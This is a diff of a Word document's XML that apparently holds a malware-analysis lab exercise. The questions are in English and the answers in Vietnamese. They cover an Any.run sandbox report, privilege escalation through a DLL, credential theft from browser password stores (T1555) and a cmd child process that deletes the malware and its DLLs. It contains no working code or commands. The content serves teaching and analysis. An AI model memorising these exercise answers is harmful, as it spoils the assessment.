+        <w:t>DLLs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>you</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>provide</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the DLL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>utilized</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>by</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>privilege</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>escalation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="417EF5C8" wp14:editId="2BA94F74">
+            <wp:extent cx="5943600" cy="2881630"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="143428115" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="143428115" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -3391,7 +6058,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2765425"/>
+                      <a:ext cx="5943600" cy="2881630"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -3403,1308 +6070,14 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="44"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Trong chi tiết quy trình, chúng ta có thể thấy phần mềm độc hại sử dụng kỹ thuật T1555, được biết đến với tên gọi "Lấy thông tin đăng nhập từ các kho lưu trữ mật khẩu." Kỹ thuật này liên quan đến việc kẻ tấn công nhắm vào các vị trí lưu trữ mật khẩu phổ biến, chẳng hạn như trình duyệt </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>web</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>, để đánh cắp thông tin đăng nhập. Bằng cách trích xuất các thông tin đăng nhập được lưu trong trình duyệt hoặc công cụ quản lý mật khẩu, kẻ tấn công có thể truy cập vào các tài khoản và hệ thống nhạy cảm của người dùng.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Top of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q6</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>By</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>examining</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>child</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>processes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>displayed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in the </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>Any.run</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>sandbox</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>report</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>which</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>directory</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>does</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>deletion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>of</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>all</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>DLL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>files</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="45"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Nhìn vào cây tiến trình, chúng ta thấy rằng tiến trình </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>cmd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> này được sinh ra dưới tiến trình </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sẽ tạm dừng trong 5 giây rồi xóa </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> cùng bất kỳ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>dll</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> nào có thể đã được tải trong quá trình thực thi</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="172D4EBE" wp14:editId="438FAB46">
-            <wp:extent cx="5943600" cy="2858135"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1039815145" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1039815145" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2858135"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Top of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
